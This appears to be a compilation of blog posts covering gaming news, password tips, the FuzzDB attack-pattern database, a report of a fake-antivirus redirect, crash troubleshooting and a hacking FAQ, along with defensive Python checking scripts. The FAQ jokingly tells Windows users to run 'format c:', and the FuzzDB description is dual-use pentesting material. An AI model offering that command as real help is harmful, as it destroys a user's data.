The Next Big Thing - Bungie Activision join Forces

Halo is one of my favorite games and I still duke it out with my friends in weekend LAN mayhem; the same can be said about COD4:MW & MW2 when it comes to gaming. It became bigger this Wednesday when Bungie, the celebrated Halo developer, entered into a 10 year “alliance” with gaming biggie Activision, and now the next-big-post-Halo-Bungie-game will be a multiplatform title. As Thomas Tippl, Chief Operating Officer of Activision Blizzard, commented -
"Today we are very proud to announce a ground breaking ten year partnership between Bungie, one of the greatest developers in the world and the makers of Halo, with Activision, the number one video game publisher, who will bring the new intellectual property to fans worldwide across all platforms"
In short, the equation goes like this -
[Image: The new equation of gaming]
The deal took over a year to finally come to a mutual point of interest, and personally, I can see some real Bungie stuff of Oni quality being developed outside the Halo universe.
Meanwhile Bungie is currently preparing itself for Halo: Reach for Xbox 360, self-dubbed the "most ambitious game" it has ever made. Meanwhile you can enjoy the Halo Reach trailer :)



How not to get Hacked – Choosing the Right Password

It's a digital nightmare when your password gets hacked. Password compromise = you are fucked, straight away. And if you do happen to be at an important position in a firm, and unfortunately find yourself the root cause of the company’s security problems, it's time to learn a few basics of choosing the right password. Be it your email ID, terminal login, voicemail or anything that uses a generic password protection system, you need to choose a secure password for your digital ventures. This simple guide is applicable to every netizen who wants to secure himself by choosing the right password. Because in the end, it's your password that makes it easy or hard for attackers to gain access to your account.

About Bad Passwords

Poor, weak passwords have the following characteristics (if yours has even one, make sure to change it) -

  • Password size less than 15 characters
  • Password is a word from the dictionary

The password is -

  • Name of family, pet, your favorite videogame character.
  • Computer terms, commands, website name, hardware, software etc.
  • Personal data like birthday, mobile phone numbers, address etc.
  • Any of the above spelled backwards, or succeeded or preceded by a number or letter (password1, 1 password)
  • In short, any form of personal stupidity leads to tragic events :P

How to get hacked ?

  • Reveal your password to anyone.
  • Reveal it in an email message or phone call, to your boss, give hints to others, share it with friends and co-workers.
  • Write it down somewhere.
  • Keep the same password for all your digital ventures, like emails, voicemails etc.

Passwords shall be hard to guess -

In any case, if you want the opposite, follow the opposite :)

Making a STRONG Password

Use phrases to form passwords; these are much more secure and hard to guess.

For example, the phrase -

“ This is a super secure password and is hard to hack :P ”

will form the password given below by taking the first letter of each word and substituting similar sounding words with numbers. See... it's quite hard to hack :)

“ Tiassp&ih2h:P ”

Use numbers, letters, uppercase and lowercase and mix them freely to form your password. Make sure it's not a dictionary word and DOES NOT CONTAIN any characteristic of weak passwords stated earlier.

A more secure version is to use passphrases to form passwords. A passphrase is a longer version of a password and hence it's more secure. Make sure it's easy to remember, not a famous quotation and hard to guess by intuition.

As Clifford Stoll says,

Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months

He is damn right... just make sure you change it every month or more often to be secure.

I guess you will now be able to form secure passwords and deploy them fully.
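The weak-password traits listed in this post can be checked mechanically. The following is an added example, not code from the original post; the word list, function names and sample passwords are constructed for illustration.

```python
import re

MIN_LENGTH = 15  # the post calls anything shorter than 15 characters weak

# Constructed stand-in for a real dictionary / common-password list.
SAMPLE_WORDS = {"password", "dragon", "monkey", "welcome", "linux", "router", "qwerty"}


def _normalise(text):
    """Lower-case and drop everything except letters and digits."""
    return re.sub(r"[^a-z0-9]", "", text.lower())


def _variants(password):
    """Forms to test: as typed, reversed, and with a number/letter affix removed."""
    base = _normalise(password)
    stripped = base.strip("0123456789")            # password1, 1 password
    forms = {base, stripped, base[1:], base[:-1]}  # one leading/trailing letter
    forms |= {form[::-1] for form in forms}        # spelled backwards
    forms.discard("")
    return forms


def weaknesses(password, personal_data=(), words=SAMPLE_WORDS):
    """Return the weak-password traits from the post that apply to `password`."""
    found = []
    if len(password) < MIN_LENGTH:
        found.append("shorter than %d characters" % MIN_LENGTH)

    forms = _variants(password)
    if forms & {word.lower() for word in words}:
        found.append("dictionary word (possibly reversed or with an added number/letter)")

    # Names, birthdays, phone numbers etc. supplied by the person being checked.
    tokens = {_normalise(item) for item in personal_data}
    tokens = {token for token in tokens if len(token) >= 3}
    if any(token in form for token in tokens for form in forms):
        found.append("contains personal data")

    classes = {
        "lowercase letter": r"[a-z]",
        "uppercase letter": r"[A-Z]",
        "digit": r"[0-9]",
    }
    missing = [name for name, pattern in classes.items()
               if not re.search(pattern, password)]
    if missing:
        found.append("missing " + ", ".join(missing))
    return found


if __name__ == "__main__":
    # Constructed sample passwords; the second one is the post's own example.
    for candidate in ("password1", "Tiassp&ih2h:P", "Purple-Kettle-7-sings-Loudly"):
        print(repr(candidate), "->", weaknesses(candidate) or "no listed weakness")
```

Run against the post's own example, `Tiassp&ih2h:P`, the check reports only the length rule, since that password is 13 characters long; a longer passphrase clears it.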





FuzzDB – Pentest using comprehensive attack patterns

Too much new software is vulnerable to the attack sequences of yesteryear. This suggests a testing approach: a comprehensive set of known attack pattern sequences can be leveraged for use in targeted fuzzing when testing for exploitable conditions in new applications. Fuzzdb is a comprehensive set of known attack pattern sequences, predictable locations, and error messages for intelligent brute force testing and exploit condition identification of web applications.

Many mechanisms of attack used to exploit different web server platforms and applications are triggered by particular meta-characters that are observed in more than one product security advisory. Fuzzdb is a database of attack patterns known to have caused exploit conditions in the past, categorized by attack type, platform, and application.

Because of the popularity of a small number of server types, platforms, and package formats, resources such as logfiles and administrative directories are typically located in a small number of predictable locations. A comprehensive database of these, sorted by platform type, makes brute force fuzz testing a scalpel-like approach.

Since system errors contain predictable strings, fuzzdb contains lists of error messages to be pattern matched against server output in order to aid detection of software security defects.

Primary sources used for attack pattern research:

  • researching old web exploits for repeatable attack strings
  • scraping scanner patterns from http logs
  • various books, articles, blog posts, mailing list threads
  • patterns gleaned from other open source fuzzers and pentest tools
  • analysis of default app installs
  • system and application documentation
  • error messages

It’s like a non-automated open source scanner without the scanner. You can download fuzzdb v1.06 here:

Download fuzzdb-1.06.tgz

Check out via svn: svn checkout fuzzdb-read-only

To keep FuzzDB updated, type

svn update

to pull the latest updates.
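The error-message matching described above can be sketched as follows, for reviewing responses captured from your own application. This is an added example, not code from fuzzdb or the original post; the signatures are a small constructed sample of widely seen error strings, and the URLs and response bodies are constructed.

```python
import re

# Constructed sample signatures built from widely seen error strings.
# They stand in for fuzzdb's error-message lists and are not copied from it.
ERROR_SIGNATURES = {
    "sql_error": [
        r"You have an error in your SQL syntax",
        r"Unclosed quotation mark after the character string",
        r"ORA-\d{5}",
    ],
    "stack_trace": [
        r"Traceback \(most recent call last\)",
        r"\bat [\w.$]+\(\w+\.java:\d+\)",
    ],
    "path_disclosure": [
        r"(?:/var/www|/home/\w+)/[^\s<\"']+",
    ],
}

COMPILED = [
    (category, re.compile(pattern))
    for category, patterns in ERROR_SIGNATURES.items()
    for pattern in patterns
]


def scan_response(body):
    """Return (category, matched text) for every signature found in one body."""
    findings = []
    for category, regex in COMPILED:
        match = regex.search(body)
        if match:
            findings.append((category, match.group(0)))
    return findings


def triage(responses):
    """Map each URL whose body leaked an error to the categories it matched."""
    report = {}
    for url, body in responses.items():
        categories = sorted({category for category, _ in scan_response(body)})
        if categories:
            report[url] = categories
    return report


# Constructed responses from a hypothetical test deployment of your own app.
SAMPLE_RESPONSES = {
    "/": "<html><body>Welcome to the shop</body></html>",
    "/item?id=1": "You have an error in your SQL syntax; check the manual "
                  "that corresponds to your MySQL server version",
    "/search": "java.lang.NullPointerException\n"
               "\tat com.example.Shop.find(Shop.java:42)",
    "/cart": "Fatal error: Uncaught Exception in /var/www/html/cart.php on line 12",
}

if __name__ == "__main__":
    for url, categories in triage(SAMPLE_RESPONSES).items():
        print(url, "->", ", ".join(categories))
```

Any page that shows up in the report is returning internal error detail to the client, which is itself worth fixing by switching to generic error pages and logging the detail server-side.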





Apple imposes lifetime ban for purchasing iPads (to a blogger ofcourse)

A blogger who goes by the name of “Protocol snow” has been banned by Apple for buying iPads. The story goes like this: as Apple launched iPads and people went crazy for them, there was a shortage of iPads all over the world. Since Mr Snow was lucky enough to live near an Apple store which had plenty of iPads available, and “coincidently” was a member of the NeoGAF gaming forums, he ordered iPads and decided to sell and ship them to his fellow NeoGAFians by covering all the shipping costs, tax and Paypal insurance fees along with the iPad. The prices were quite reasonable and he limited his purchases to no more than 2 per day because he heard that there was a limit per person.
Then he went shit out of luck on April 17, when Mr Snow’s fateful visit to the Apple store brought his purchases to an end for the rest of his life. The unexpected conversation between Mr Snow (Me) and the Apple folks (Guy #1, Guy #2) that concluded in his ban went like this -
Me (nonchalantly) — “Is there an issue?”
Guy #2 — “There is a limit to the number of iPads that customers can buy.”
Me (playing dumb) — “Oh, is that right? What’s the limit?”
Guy #2 — “Only 2 per customer.”
Guy #1 — “I’m sorry sir, but you have reached your lifetime limit of iPad purchases and will not be allowed to buy any more.”
Me (anticipating that statement) — “Is the iPad limit per person? Per credit card? Per household?”
Guy #1 — “All I can say is that you have reached your lifetime limit.”
Me — “What does that mean? Can I use a different credit card to buy it? I’m buying this for a friend.”
Guy #1 — “You are not allowed to buy this iPad.”
Me — “Uhh… is it ok if I have a family member or friend come to buy it for me? My reservation doesn’t expire until 6:00 PM.”
Guy #1 — “All I can say is that you have reached your lifetime limit.”
Me (suddenly realizing what he’s saying) — “Wait, what? Lifetime? What does that mean?”
Guy #1 — “All I can say is that you have reached your lifetime limit of iPads and will not be allowed to buy any more.”
Me — “I’m banned from buying iPads? I know there’s a shortage right now, but I can’t buy any more once there’s plenty of stock?”
Guy #1 — “All I can say is that you have reached your lifetime limit.”
Me — “Ok buddy, I’m not going to make a scene so I’m leaving. How many iPads is the limit by the way?”
Guy #1 — “That information is not available.”
Me (looking at Guy #2, who has been silent this whole time) — “He tells me that the limit is two.”
Guy #1 — “I wish I could say but I do not have that information.”
Me — “I’ve already purchased more than 2 iPads. Why didn’t anybody else stop me in the past?”
Guy #1 — “I wish I could say but I do not have that information.”
Me — “Alright, I’ve had enough. Have a good day.”
Guess Apple is tightening its grip on the iPad and is reworking its watch on the grey market. Meanwhile, Mr Snow’s blog has been hammered by 240 plus comments and a shit load of traffic :)



Favorite timepass – bashing charlatans at Attrition.Org


When I am not messing with my PC, watching AVGN, or reading Wikipedia, I prefer to be at Attrition.Org, which in my opinion is the best place to hang out after any LUG. For those who don't know about Attrition.Org, it's basically a “hobby site” that focuses on computer security and mocks the revered security researchers who are basically frauds with illiterate whoring media on their side.

As the description on the site says, Attrition.org is a computer security web site dedicated to the collection, dissemination and distribution of information about the security industry for anyone interested in the subject. They maintain one of the only open and honest grim look at the industry, reminding everyone that we must strive to be better than we have been historically. Their crusade to expose industry frauds and inform the public about incorrect information in computer security articles is a primary goal of the site.

My favorite section is the charlatans section of the website, where fake security experts are bashed for their fraudulent actions and other “unethical” reasons. My favorite one is the case of Ankit Fadia, the once acclaimed Indian child prodigy and author (though in my opinion, nothing more than a script kiddie; lots of poor journalism is responsible for getting him the place he stands today).

Additionally, Attrition regularly publishes opinion pieces such as "Security Rants" pointing out problems with the computer security industry. Folks at Attrition are responsible for maintaining one of the biggest lists of defaced websites (though they ceased to maintain it after 2001) and maintained the Data Loss Database, which records the data breaches at companies.





Fans go Gaga over Marvel Vs Capcom 3

At Captivate 2010, fighting crossover giant Capcom has announced what fans have been wanting for a long time – Marvel vs Capcom 3. For those who don't know what it is all about, it's the series that defined crossover fighting games and is the fifth installment in its series. As usual, the game will feature a whole array of Marvel and Capcom characters including fan favorites Ryu and Morrigan from Capcom's fighting roster and Wolverine, Hulk and Iron Man from Marvel’s side. The best part? Chris Redfield is included in the upcoming installment and trust me, it's going to be awsummmm !!!! MVC3 is the first to feature 3D graphics in its series and, like its predecessor, will be featuring a 3-on-3 tag-team based fighting system. The game will be powered by Capcom’s MT Framework engine which has previously illustrated its prowess in Resident Evil 5, Devil May Cry 4 and Lost Planet.


On a personal note, I prefer Street Fighter more... but I'm a fighting game junkie and I still remember duking it out with my friends in Marvel vs Capcom 2, and the whole experience wants some more bashing :)

MVC3 will be released on PS3 and Xbox 360. Who knows, it might also be released on PC too, as it's powered by MT Framework and we already have Street Fighter 4 with us.

You can check out the cool trailer below :)





Create solar eclipse in photoshop

This is a tutorial to create an eclipse artificially in Photoshop, originally written by my friend Satwik Sharma a long time ago. I guess I'm getting less time to post articles nowadays so it might be okay to bring up some lesser read articles of my blog into the spotlight. Jokes apart, let's get to business. This solar eclipse can be used as a great background too. Even beginners should try this tutorial. You will get to know some tools and their use. It's not at all difficult. I've tried to make it as simple as possible for even beginners to understand. So here goes.

Step 1 : Open a New 640 x 400 pixel document by going to File>New.

Step 2 : Click the Paint Bucket Tool. Set the Background colour to Black. (It is so by default).

Step 3 : The White Layer has been filled with Black using the Paint Bucket Tool.

Step 4 : Click the New Layer Button shown. It will create a new layer.

Step 5 : The New Layer has been created.
Step 6 : Select the Elliptical Marquee Tool by clicking it.

Step 7 : Press Shift on the keyboard and drag. A perfect circle will be created.

Step 8 : Now set the Foreground Colour to White. Clicking on the small arrow switches between the Foreground and Background colour. Select the Paint Bucket Tool again.

Step 9 : This is how it should look after filling the circle with White.
Step 10 : Go to Select>Deselect to deselect the Elliptical Marquee Tool.

Step 11 : The Opacity and Fill sliders are in the Layers/Channels/Paths palette at the bottom right of Photoshop. Drag the Fill slider to the extreme left. This will cause the white circle to disappear.
Step 12 : Go to Layer>Layer Style>Outer Glow as shown.
Step 13 : Drag the Size slider to the right after this dialogue box opens. There is no hard and fast rule for how much you should drag. It should satisfy you.
Step 14 : This is how it should look after clicking OK. Now REPEAT this step.
Step 15 : This is how it looks after repeating the above step. The glow is more diffused now.

Step 16 : Now go to Layer>Layer Style>Inner Glow

Step 17 : In the dialogue box which opens drag the Size slider to the right till you are satisfied with the result. Click OK.

Step 18 : Now go to the Layers/Channels/Paths palette. Press SHIFT on the keyboard to select both Background and Layer 1.
Step 19 : Now right click as shown. It will bring up the dialogue box as shown. Click MERGE LAYERS.
Step 20 : The Layers have been merged.

Step 21 : Now click the New Layer Button. It will create a new layer as shown.

Step 22 : Double click the background. The background layer cannot be edited. Therefore double click it to make a copy of it.
Step 23 : This dialogue box opens click OK.

Step 24 : Now drag Layer 1 below Layer 0 as shown. Now Fill Layer 1 with Black using the Paint Bucket Tool.

Step 25 : Now click Layer 0 and click the Quick Mask button. It will create a Quick Mask on Layer 0.

Step 26 : Now click the Gradient Tool shown above.

Step 27 : Make sure the Black to White gradient is selected. You can select it by clicking it if it is not selected.

Step 28 : Now drag the Gradient Tool from the bottom right to the middle as shown.
Step 29 : This is how it looks after applying the gradient. A few more steps remain. Just be patient.

Step 30 : Now just as in Step 18 and 19 select both the layers by clicking on the layers while pressing SHIFT key. Then Merge both layers.
Step 31 : Now go to Filter>Render>Lens Flare.

Step 32 : When the above dialogue box opens choose 50-300mm Zoom, the first one, and click OK. That is all.
This is the completed image and you can flaunt it to your friends :)



New Virus Attack - Blogger-Wordpress compromised ?

As I was checking several blogs and websites today, I found that several of them redirected me to either or a Bing search page for “freevirusscan”.


Several Blogger and WordPress blogs seemed to have been affected. In my case I visited this blog (gosh... it's a Blogger blog) and this site was redirected to -

which first displayed a window almost identical to a standard "My computer" screen on a windows pc and looked like the typical type of windows malware. It alerted me of various viruses/Trojans (downloader.win32.agent etc.) detected on my computer, followed by a prompt to install "System Security Antivirus" and such by clicking "ok". With no option to close the window, and with no other active windows, I clicked cancel for no result as I got a message that windows security center recommends it as an install and hence the cycle repeats.

When I got rid of that page and revisited it, the page was gone and instead redirected me to a Bing search page for the search term “freevirusscan”.



On closer inspection I found out that affected blogs load a script just before the </body> tag with no recognizable pattern (at least for me). Also I monitored my cookies and found that after being redirected to Bing, a cookie is set to prevent the user from being redirected for 20 days.

Several WordPress blogs also displayed the same vulnerability. On later googling I found a user in an Apple forum with the same problem. A new virus attack on WordPress/Blogger? Seems so, as I was running Linux and seemed to have no malware installed on my Linux machine. Tested this on a clean Windows machine and got positive results.

Keep your eyes open folks..
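One way a blog owner could check saved page source for the symptom described above, a script loaded just before `</body>`, is to list the scripts in that position that are inline or come from a host outside an allowlist. This is an added example, not code from the original post; the host names and HTML samples are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class TrailingScriptFinder(HTMLParser):
    """Collect the run of <script> elements that sits directly before </body>."""

    def __init__(self):
        super().__init__()
        self.trailing = []           # scripts seen since the last other content
        self.before_body_end = None  # snapshot taken when </body> is reached
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.trailing.append({"src": dict(attrs).get("src"), "inline": ""})
        else:
            self.trailing = []       # any other element breaks the run

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "body" and self.before_body_end is None:
            self.before_body_end = list(self.trailing)
        else:
            self.trailing = []

    def handle_data(self, data):
        if self._in_script:
            self.trailing[-1]["inline"] += data
        elif data.strip():
            self.trailing = []       # visible text breaks the run


def suspicious_trailing_scripts(html, page_host, allowed_hosts=()):
    """Return scripts just before </body> that are inline or from unknown hosts."""
    finder = TrailingScriptFinder()
    finder.feed(html)
    finder.close()
    allowed = {page_host.lower(), *(host.lower() for host in allowed_hosts)}
    flagged = []
    for script in finder.before_body_end or []:
        if script["src"] is None:
            # Inline code cannot be allowlisted by host; report it for review.
            flagged.append(("inline", script["inline"].strip()[:60]))
            continue
        host = (urlparse(script["src"]).hostname or page_host).lower()
        if host not in allowed:
            flagged.append(("external", script["src"]))
    return flagged


# Constructed page sources; blog.example and unknown-host.invalid are placeholders.
CLEAN_PAGE = ('<html><body><div>post</div>'
              '<script src="/js/site.js"></script></body></html>')
INJECTED_PAGE = ('<html><body><div>post</div>'
                 '<script src="/js/site.js"></script>\n'
                 '<script src="http://unknown-host.invalid/x.js"></script>\n'
                 '</body></html>')

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, suspicious_trailing_scripts(page, "blog.example"))
```

Legitimate widgets and analytics also load at the end of the body, so hosts you expect go in `allowed_hosts` and anything left over is compared against the template you actually published.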






Top reasons Why PC’s Crash – Curing Blue Screen of Death

“Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."
You have just been struck by the Blue Screen of Death.


Anyone who uses Microsoft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?
Let's get down to it…

Hardware conflict
The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.
For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.
If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:
* Start-Settings-Control Panel-System-Device Manager.
Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.
Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.
Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).
When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.
To be fair to Microsoft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

Bad Ram
Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.
But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.
One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.
Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.
EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programs.

BIOS settings
Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.
Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.
A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.
Microsoft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

Hard disk drives
After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to
* Start-Programs-Accessories-System Tools-Disk Defragmenter
This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.
The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).
Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to
* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.
Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.
Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to
* Start-Programs-Accessories-System Tools-ScanDisk
Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

Fatal OE exceptions and VXD errors
Fatal OE exception errors and VXD errors are often caused by video card problems.These can often be resolved easily by reducing the resolution of the video display. Go to
* Start-Settings-Control Panel-Display-Settings
Here you should slide the screen area bar to the left. Take a look at the color settings on the left of that window. For most desktops, high color 16-bit depth is adequate.
If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to
* Start-Settings-Control Panel-System-Device Manager
Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.
If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.
The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.
Another useful way to resolve video problems is to go to
* Start-Settings-Control Panel-System-Performance-Graphics
Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).
Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to
* Start-Settings-Control Panel-Add/Remove Programs
Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.
A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.
An excellent antivirus program is McAfee Virus Scan by Network Associates. Another is Norton Antivirus 2000, made by Symantec.

The action of sending a document to print creates a bigger file, often called a postscript file.
Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.
If the printer is trying to print unusual characters, these might not be recognized, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the program in the System Registry and leaves the way clear for a completely fresh copy.
The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Registry Cleaner to clean up the System Registry and remove obsolete entries. 
Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.
Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.
Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.
Remember to restore all the BIOS settings back to their former settings following installation.

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.
One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from or
CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

Power supply problems
With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.
If this has become a nuisance for you then consider buying an uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.
It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

I hope now you will be able to rectify your problems. Keep reading and learning.

posted by XERO . Anonymous Author

HACKING FAQ - Solution to the ultimate beginners problems


Eric S. Raymond throws some light on the questions most asked by amateurs and answers them in the most appropriate way. This is the ultimate hacking FAQ to go with if you are beginning to learn the art. This FAQ focuses on hacking ethics and the right way to start and pursue your passion for it if you are really serious.

Interested ? Read on..

HACKING - Frequently Asked Questions

Q: Will you teach me how to hack?

Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects take up 110% of my time.
Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.
Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.

Q: How can I get started, then?

The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.

Q: When do you have to start? Is it too late for me to learn?

Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.

Q: How long will it take me to learn to hack?

That depends on how talented you are and how hard you work at it. Most people can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don't think it ends there, though; if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.

Q: Are Visual Basic or Delphi good languages to start with?

No, because they're not portable. There are no open-source implementations of these languages, so you'd be locked into only those platforms the vendor chooses to support. Accepting that kind of monopoly situation is not the hacker way.
Visual Basic is especially awful. The fact that it's a proprietary Microsoft language is enough to disqualify it, and like other Basics it's a poorly-designed language that will teach you bad programming habits.
One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't supported under at least three different vendors' operating systems is a poor one to learn to hack in.

Q: Would you help me to crack a system, or teach me how to crack?

No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.

Q: I've been cracked. Will you help me fend off further attacks?

No. Every time I've been asked this question so far, it's been from somebody running Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, it's like trying to bail out a boat with a sieve. The only reliable prevention is to switch to Linux or some other operating system with real security.

Q: I'm having problems with my Windows software. Will you help me?

Yes. Go to a DOS prompt and type "format c:". The problems you are experiencing will cease within a few minutes.

Q: Where can I find some real hackers to talk with?

The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at Metalab).
(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)

Q: Can you recommend useful books about hacking-related subjects?

I maintain a Linux Reading List HOWTO that you may find helpful.

Q: What language should I learn first?

HTML, if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.
But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn and (in my opinion) less well designed. There are resources for programming beginners using Python in the Web.
C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first.
Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid.

Q: Do I need to hate and bash Microsoft?

No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one when Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code -- that will bash Microsoft quite sufficiently without polluting your karma.

Q: But won't open-source software leave programmers unable to make a living?

This seems unlikely -- so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be free after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.

Q: How can I get started? Where can I get a free Unix?

Elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now... 

Eric S. Raymond & Elf Qrin . UNKNOWN COMPILATION . X.E.R.O

SQL Injection – Learn to Attack

